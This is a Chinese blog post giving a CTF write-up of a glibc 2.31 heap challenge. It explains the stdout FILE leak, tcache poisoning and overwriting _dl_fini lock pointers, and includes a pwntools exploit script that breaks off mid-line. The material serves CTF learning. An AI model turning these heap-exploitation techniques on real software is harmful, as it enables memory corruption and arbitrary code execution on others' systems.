<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"a2ur2.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="一、前言时隔一个月某有更新博客了，上一次搞那个patchelf调了快半个星期没弄好之后心态大崩，一下子动力失去，直接摆烂了一整个五一。五一过后没多久，被uuu师傅狠狠的打击到了orz，又捡起来了继续pwn。然后紧接着就是省赛，看了下去年的省赛两题都是2.31的堆，都是没有输出函数要打stdout去输出，最后劫持tcache去getshell，当时一看差点直接晕厥，后面一个多星期速成完了tcache">
<meta property="og:type" content="article">
<meta property="og:title" content="stdout，tcache和exit hook一锅端">
<meta property="og:url" content="https://a2ur2.github.io/2022/05/25/%E5%88%9D%E6%8E%A2IO%20FILE%E4%BB%A5%E5%8F%8A%E5%85%B3%E4%BA%8Eexit%20hook%E7%9A%84%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="A2ur2的梦想小屋">
<meta property="og:description" content="一、前言时隔一个月某有更新博客了，上一次搞那个patchelf调了快半个星期没弄好之后心态大崩，一下子动力失去，直接摆烂了一整个五一。五一过后没多久，被uuu师傅狠狠的打击到了orz，又捡起来了继续pwn。然后紧接着就是省赛，看了下去年的省赛两题都是2.31的堆，都是没有输出函数要打stdout去输出，最后劫持tcache去getshell，当时一看差点直接晕厥，后面一个多星期速成完了tcache">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/25/XAA3Af.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/25/XAdSoV.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/26/XEcXRI.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/25/XADlNt.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/26/XEJM3d.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/26/XEWkJH.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/26/XEW0kF.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/26/XEWylR.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/26/XEWopd.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/26/XEocXd.png">
<meta property="article:published_time" content="2022-05-25T11:29:14.000Z">
<meta property="article:modified_time" content="2022-05-26T11:45:33.700Z">
<meta property="article:author" content="A2ur2">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s1.ax1x.com/2022/05/25/XAA3Af.png">

<link rel="canonical" href="https://a2ur2.github.io/2022/05/25/%E5%88%9D%E6%8E%A2IO%20FILE%E4%BB%A5%E5%8F%8A%E5%85%B3%E4%BA%8Eexit%20hook%E7%9A%84%E5%88%A9%E7%94%A8/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>stdout，tcache和exit hook一锅端 | A2ur2的梦想小屋</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">A2ur2的梦想小屋</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">我许下的愿望该向谁去说明</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://a2ur2.github.io/2022/05/25/%E5%88%9D%E6%8E%A2IO%20FILE%E4%BB%A5%E5%8F%8A%E5%85%B3%E4%BA%8Eexit%20hook%E7%9A%84%E5%88%A9%E7%94%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="A2ur2">
      <meta itemprop="description" content="在成为大赛pwn题签到员的路上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="A2ur2的梦想小屋">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          stdout，tcache和exit hook一锅端
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-05-25 19:29:14" itemprop="dateCreated datePublished" datetime="2022-05-25T19:29:14+08:00">2022-05-25</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-05-26 19:45:33" itemprop="dateModified" datetime="2022-05-26T19:45:33+08:00">2022-05-26</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="一、前言"><a href="#一、前言" class="headerlink" title="一、前言"></a>一、前言</h2><p>时隔一个月某有更新博客了，上一次搞那个patchelf调了快半个星期没弄好之后心态大崩，一下子动力失去，直接摆烂了一整个五一。五一过后没多久，被uuu师傅狠狠的打击到了orz，又捡起来了继续pwn。然后紧接着就是省赛，看了下去年的省赛两题都是2.31的堆，都是没有输出函数要打stdout去输出，最后劫持tcache去getshell，当时一看差点直接晕厥，后面一个多星期速成完了tcache和stdout输出，对这两个技巧有了大致了解后就是五月的das了，又是stdout输出（</p>
<p>直接赶趟了，一篇博客一道题搞完劫持stdout还有最后利用tcache劫持到exit hook完成getshell</p>
<span id="more"></span>

<h2 id="二、做题前置知识"><a href="#二、做题前置知识" class="headerlink" title="二、做题前置知识"></a>二、做题前置知识</h2><p>少年，我想你看完前置的知识，打通例题毫无🍐</p>
<h3 id="1、关于IO-FILE"><a href="#1、关于IO-FILE" class="headerlink" title="1、关于IO FILE"></a>1、关于IO FILE</h3><h4 id="初识IO-FILE"><a href="#初识IO-FILE" class="headerlink" title="初识IO FILE"></a>初识IO FILE</h4><p>关于IO，一开始是听说2.34版本ban掉了两个hook之后，基本都是打IO去getshell，直到现在我还没有完全看懂和理解IO。</p>
<p>关于IO FILE，结合众多师傅的博客和ctfwiki，我们对其有了大致的了解。</p>
<p>IO FILE有若干个相关的结构体，例如_IO_FILE_plus等，用于完成IO的相关功能（具体的我目前还没有仔细去了解，大致理解为控制IO函数完成输出输入等功能）。stdout就是其中一个IO结构体。_</p>
<p>_当我们调用puts函数时， <code>_IO_puts</code> 函数内部会调用 <code>_IO_sputn</code>，结果会执行 <code>_IO_new_file_xsputn</code>，最终会执行 <code>_IO_overflow</code> （摘自<a href=" https://a1ex.online/2020/08/31/IO-FILE%E6%B3%84%E9%9C%B2libc%E5%9C%B0%E5%9D%80/ "><strong>A1lx</strong></a>师傅的博客），当我们能控制stdout这个结构体里面的内容，经过特殊布局绕过检测后，就能够输出一个libc函数的地址，从而计算出libc的基地址</p>
<p>stdout其中布局为：payload&#x3D;p64(0xfbad1800)+p64(0)*3+’\x00’时即可，至于想细究为何，上面A1lx师傅的连接里就有，如果要利用只需要申请到stdout布局payload即可</p>
<h4 id="如何找到stdout的位置"><a href="#如何找到stdout的位置" class="headerlink" title="如何找到stdout的位置"></a>如何找到stdout的位置</h4><p>首先我们是并不知道stdout结构体的位置的，因此我们需要利用到unsorted bin的残留指针，在前面我们知道堆块在进入unsorted bin时会有指针指向main_arena+96的位置</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XAA3Af"><img src="https://s1.ax1x.com/2022/05/25/XAA3Af.png" alt="XAA3Af.png"></a></p>
<p>然后我们再来康康我们的stdout结构体</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XAdSoV"><img src="https://s1.ax1x.com/2022/05/25/XAdSoV.png" alt="XAdSoV.png"></a></p>
<p>前面的0x7ff那一串是不是惊人的相似，与此同时同一libc的低三位是不变的，所以即使在地址随机化的情况下我们也可以知道libc的低三位是多少，例如本图上就是0x6a0。那么我们这个存在unsorted bin里指向main_arena+96的fd指针，这里面只有第四位我们是不清楚是多少，但是我们可以爆破💣这个第四位，就有1&#x2F;16的概率让这个指针指向我们的stdout结构体。此时利用这个残留指针就能申请堆块到stdout结构体。</p>
<h4 id="what’s-残留的fd指针"><a href="#what’s-残留的fd指针" class="headerlink" title="what’s 残留的fd指针"></a>what’s 残留的fd指针</h4><p>接下来就是如何把我们的堆块🐏进stdout结构体里</p>
<p>这里我要特别mark一下什么叫做<strong>残留的指针</strong></p>
<p>众所周知，当我们在tcache里面找不到符合用户申请大小的堆块时，<del>会去unsorted bin里找，如果有size&gt;malloc_size的堆块，就会切割该堆块用以满足用户需求</del>。切割过后，fd指针就会移动到剩余的空闲堆块里。就是这个<strong>移动</strong>，移动下去后，原本的地方不会变成0，而是会残留原本的fd指针。</p>
<p>giao！和uuu师傅一番交♂流后，我领悟了为什么会有这个残留的指针。原因是我们malloc的时候，当我们去割unsorted之前，系统会遍历整理一遍unsorted bin里面的chunk，找有没有直接符合malloc_size的堆块，并且按照大小让unsorted里面的chunk进入small或者largebin，如果遍历了unsorted后依旧满足不了，就会去largebin里找符合size&gt;malloc_size的堆块，如果有，就切割该堆块，并且将剩余的部分丢回去unsorted bin。因为一开始是从unsorted bin过来largebin的，所以切出来的部分fd区域存有一个指针，剩余的部分因为丢回去了unsorted bin，所以会有一个指向main_arena的指针，所以我们看起来才会像fd被挤下去了。uuu师傅tql呜呜呜</p>
<p>附上uuu师傅调demo的图：</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XEcXRI"><img src="https://s1.ax1x.com/2022/05/26/XEcXRI.png" alt="XEcXRI.png"></a></p>
<p>接着如图，就能看到有两个指向main_arena的指针：</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XADlNt"><img src="https://s1.ax1x.com/2022/05/25/XADlNt.png" alt="XADlNt.png"></a></p>
<p>在割了0x21大小的堆块出来后，该0x21大小的堆块里残留着一个fd指针，如何利用</p>
<p>因此我愿称之为时间刺客-艾克（有个影子</p>
<h3 id="2、关于tcache"><a href="#2、关于tcache" class="headerlink" title="2、关于tcache"></a>2、关于tcache</h3><h4 id="tcache结构体"><a href="#tcache结构体" class="headerlink" title="tcache结构体"></a>tcache结构体</h4><p>在glibc2.26版本之后，就加入了tcache bin用于管理空闲的堆块</p>
<p>关于tcache bins，glibc定义了 tcache_entry和tcache_perthread_struct两个结构体用于管理tcache bins，并且tcache struct是分配到了堆上，在堆最初产生时会分配出一定内存来保存tcache struct，如图：</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XEJM3d"><img src="https://s1.ax1x.com/2022/05/26/XEJM3d.png" alt="XEJM3d.png"></a></p>
<p>我们可以看到，在2.31版本下这个0x291就是分配来管理tcache bins的（之前的版本大小好像不是这个），我们也可以劫持整个tcache struct去攻击。</p>
<h4 id="tcache的攻击手段"><a href="#tcache的攻击手段" class="headerlink" title="tcache的攻击手段"></a>tcache的攻击手段</h4><p>tcache和fast bin类似，都是用FILO的单链表来维护，范围在0x20~0x420，默认每一条链表的大小为7，但是tcache并没有fastbin类似的size_check，这意味着通过我们利用tcahe可以更加方便的把堆块申请到任意地址上。而且tcache和fastbin一样，可以构造double free。</p>
<p>但是在glibc版本更新后，tcache加入了一些检测，其中加入了key字段指向tcache struct，以此来防止double free。与此同时，加入了counts位去记录这一条tcache bins链表里存储了多少个tcache（这也是为什么在<a href=" https://a2ur2.github.io/2022/04/11/fastbin%20attacked/#more"><strong>fastbin attack那篇</strong></a>博客里，我们取不出fake_chunk的原因），这意味着如果我们释放了一个chunk进入tcache，伪造了这个chunk的next指针后，是申请不出来这个next指针指向的区域的，因为此时我们的counts位为0，系统认为这里面没有堆块了，转而从top chunk切割。所以我们如果想要顺利取出fake_chunk就得控制下counts位。</p>
<h3 id="3、关于exit-hook"><a href="#3、关于exit-hook" class="headerlink" title="3、关于exit hook"></a>3、关于exit hook</h3><p>实际上并没有exit hook，他不是一个钩子函数，而是在exit函数进入时会调用的一个函数指针(<strong>exit-&gt; __run_exit_handlers -&gt; _dl_fini</strong> 这么一条调用链)</p>
<p>关键就在这个fini函数，它会调用rtld_lock_default_lock_recursive 和 rtld_lock_default_unlock_recursive 函数，并且有一个 <a target="_blank" rel="noopener" href="https://elixir.bootlin.com/glibc/glibc-2.31/C/ident/GL">GL</a>(dl_load_lock) 的传参。 因此我们不难想到两种利用exit hook来getshell的方法，一种是直接改成onegadget，另一种是改成system并且控制参数。</p>
<p>此外，exit函数属于libc函数，偏移可以计算出来，因此我们能有办法得到fini函数调用的两个函数位置，再通过申请chunk到这个地址上，就能修改函数指针使其指向我们最♥的onegadget或者system。</p>
<p>如果要通过改成system来getshell，就得控制GL（dl_load_lock）这一传参。gdb 跟进会发现，它其实是结构体_rtld_global的一部分，_rtld_global._dl_load_lock.mutex.__size的地址。</p>
<h2 id="三、例题-DASCTF-x-MAY-山重水复"><a href="#三、例题-DASCTF-x-MAY-山重水复" class="headerlink" title="三、例题 DASCTF x MAY 山重水复"></a>三、例题 DASCTF x MAY 山重水复</h2><h4 id="一些bbll"><a href="#一些bbll" class="headerlink" title="一些bbll"></a>一些bbll</h4><p>又是一月一度的DAS，只能说看着uuu师傅ak，只能膜拜orz。</p>
<p>这个题赛中十二点就有思路了，但是这个offbyone审计代码的时候觉得有，但是上手调一把之后发现没有chunk overlap的现象，就以为是我自己审错了，然后折磨了自己好久，最后随手申请了size为6的堆块，输入了7个a，gdb进去一看是7个，才发现真有off by one，是我申请的size不对（要8结尾的size），没有复用到presize，导致没有chunk overlap（还是太菜了</p>
<h4 id="代码分析"><a href="#代码分析" class="headerlink" title="代码分析"></a>代码分析</h4><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XEWkJH"><img src="https://s1.ax1x.com/2022/05/26/XEWkJH.png" alt="XEWkJH.png"></a></p>
<p>经典菜单列表，给了一个手动调用exit的机会，但是没有输出堆块内容的函数，所以就想到应该是打stdout泄露地址，打exit hook去getshell。</p>
<p>但是为啥我们不去选择我们的老相好malloc_hook或者free_hook呢，原因在于他每一次选择完后都会调用一次check函数</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XEW0kF"><img src="https://s1.ax1x.com/2022/05/26/XEW0kF.png" alt="XEW0kF.png"></a></p>
<p>而在这个check函数里面，我们的老相好被kill了<a target="_blank" rel="noopener" href="https://imgtu.com/i/XEWylR"><img src="https://s1.ax1x.com/2022/05/26/XEWylR.png" alt="XEWylR.png"></a></p>
<p>在edit函数里，他写入数据的函数是自己定义的一个my_read（这一看就有问题</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XEWopd"><img src="https://s1.ax1x.com/2022/05/26/XEWopd.png" alt="XEWopd.png"></a></p>
<p>存在off by one</p>
<h4 id="利用逻辑"><a href="#利用逻辑" class="headerlink" title="利用逻辑"></a>利用逻辑</h4><p>首先因为tcache的存在，我们想要利用unsorted bin的话，要么填满tcache，要么申请一个大于0x420的堆块。这里我们采用第二种方法，于此同时，因为off by one写不进三位，所以这里我们采用的方法是用chunk0去改写chunk1的size，让chunk1包含chunk2，利用chunk1去修改chunk2的size达到目的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0</span>,<span class="number">0xb8</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x68</span>)<span class="comment">#2</span></span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x68</span>)<span class="comment">#3</span></span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x38</span>)<span class="comment">#4</span></span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x38</span>)<span class="comment">#5</span></span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x400</span>)<span class="comment">#6</span></span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x10</span>)<span class="comment">#7</span></span><br><span class="line">edit(<span class="number">0</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0xb8</span>+p8(<span class="number">0xe1</span>))<span class="comment">#2 3overlap</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="comment">#add(1,0x68)</span></span><br><span class="line">dele(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0xd8</span>)<span class="comment">#2 control 3</span></span><br><span class="line">edit(<span class="number">1</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x68</span>+p64(<span class="number">0x501</span>)+<span class="string">b&#x27;\n&#x27;</span>)<span class="comment">#3-&gt;430</span></span><br></pre></td></tr></table></figure>

<p>然后我们释放掉chunk2，让2带着3、4、5，一起滚进去unsorted bin</p>
<p>此时释放掉4，5，让其进入tcache，为unsorted bin的fd能变成tcache的next指针做准备</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">dele(<span class="number">2</span>)<span class="comment">#3 getin unsorted</span></span><br><span class="line">dele(<span class="number">4</span>)<span class="comment">#getin tcache</span></span><br><span class="line">dele(<span class="number">3</span>)</span><br></pre></td></tr></table></figure>

<p>这里有一个小细节，我们先dele（4）再dele（3），因为我们说过，tcache会有counts位记录当前链表有几个chunk，所以我们先放多一个进去，让它的counts为2，然后用3这个堆块去接unsorted bin的fd，这样就能申请出来fake_chunk</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XEocXd"><img src="https://s1.ax1x.com/2022/05/26/XEocXd.png" alt="XEocXd.png"></a></p>
<p>最后我们再申请一个0x2的小堆块，再次切割unsorted bin，此时我们编辑这个小堆块就能修改两个字节，并且这个堆块也在tcache里（因为刚刚我们是通过free掉本来存在的3，让其进入tcache，而3本来就在伪造的大chunk里面，所以我们申请0x20，就会去切割unsorted ，分配给我们这块进入了tcache的内存，达到类似UAF的效果），因此就能够修改这个残留的fd去撞stdout结构体。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">3</span>,<span class="number">0x68</span>)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">2</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">edit(<span class="number">4</span>,<span class="string">b&#x27;\xa0\xb6&#x27;</span>+<span class="string">b&#x27;\n&#x27;</span>)</span><br><span class="line">add(<span class="number">7</span>,<span class="number">0x30</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">add(<span class="number">8</span>,<span class="number">0x30</span>)</span><br><span class="line">edit(<span class="number">8</span>,p64(<span class="number">0xfbad1800</span>)+p64(<span class="number">0</span>)*<span class="number">3</span>+<span class="string">b&#x27;\x00\n&#x27;</span>)</span><br><span class="line">libc=u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br></pre></td></tr></table></figure>

<p>然后再利用一次tcache poisoning去申请到exit hook，填上one gadget</p>
<h4 id="完整exp："><a href="#完整exp：" class="headerlink" title="完整exp："></a>完整exp：</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">p=process(<span class="string">&#x27;./no&#x27;</span>)</span><br><span class="line"><span class="comment">#p=remote(&#x27;node4.buuoj.cn&#x27;,27829)</span></span><br><span class="line">elf=ELF(<span class="string">&#x27;./no&#x27;</span>)</span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">menu</span>(<span class="params">choice</span>):</span><br><span class="line">   p.sendlineafter(<span class="string">&#x27;Your choice:&#x27;</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params"><span class="built_in">id</span>,size</span>):</span><br><span class="line">   menu(<span class="number">1</span>)</span><br><span class="line">   sleep(<span class="number">0.1</span>)</span><br><span class="line">   p.sendlineafter(<span class="string">&#x27;Idx:&#x27;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">   sleep(<span class="number">0.1</span>)</span><br><span class="line">   p.sendlineafter(<span class="string">&#x27;Size:&#x27;</span>,<span class="built_in">str</span>(size))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params"><span class="built_in">id</span>,content</span>):</span><br><span class="line">   menu(<span class="number">2</span>)</span><br><span class="line">   p.sendlineafter(<span class="string">&#x27;Idx:&#x27;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">   p.sendafter(<span class="string">&#x27;context:&#x27;</span>,content)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dele</span>(<span class="params"><span class="built_in">id</span></span>):</span><br><span class="line">   menu(<span class="number">3</span>)</span><br><span class="line">   p.sendlineafter(<span class="string">&#x27;Idx:&#x27;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exit</span>():</span><br><span class="line">   menu(<span class="number">4</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0xb8</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x68</span>)<span class="comment">#2</span></span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x68</span>)<span class="comment">#3</span></span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x38</span>)<span class="comment">#4</span></span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x38</span>)<span class="comment">#5</span></span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x400</span>)<span class="comment">#6</span></span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x10</span>)<span class="comment">#7</span></span><br><span class="line">edit(<span class="number">0</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0xb8</span>+p8(<span class="number">0xe1</span>))<span class="comment">#2 3overlap</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="comment">#add(1,0x68)</span></span><br><span class="line">dele(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0xd8</span>)<span class="comment">#2 control 3</span></span><br><span class="line">edit(<span class="number">1</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x68</span>+p64(<span class="number">0x501</span>)+<span class="string">b&#x27;\n&#x27;</span>)<span class="comment">#3-&gt;430</span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">2</span>)<span class="comment">#3 getin unsorted</span></span><br><span class="line">dele(<span class="number">4</span>)<span class="comment">#getin tcache</span></span><br><span class="line">dele(<span class="number">3</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x68</span>)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">2</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">edit(<span class="number">4</span>,<span class="string">b&#x27;\xa0\xb6&#x27;</span>+<span class="string">b&#x27;\n&#x27;</span>)</span><br><span class="line">add(<span class="number">7</span>,<span class="number">0x30</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">add(<span class="number">8</span>,<span class="number">0x30</span>)</span><br><span class="line">edit(<span class="number">8</span>,p64(<span class="number">0xfbad1800</span>)+p64(<span class="number">0</span>)*<span class="number">3</span>+<span class="string">b&#x27;\x00\n&#x27;</span>)</span><br><span class="line">libc=u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">one_gadget=[<span class="number">0xe6c7e</span>,<span class="number">0xe3b2e</span>,<span class="number">0xe3b31</span>,<span class="number">0xe3b34</span>,<span class="number">0xe3d23</span>,<span class="number">0xe3d26</span>,<span class="number">0xe3d99</span>,<span class="number">0xe3de5</span>,<span class="number">0xe3ded</span>]</span><br><span class="line">libc_base=libc-<span class="number">0x1eb980</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#dele()</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc))</span><br><span 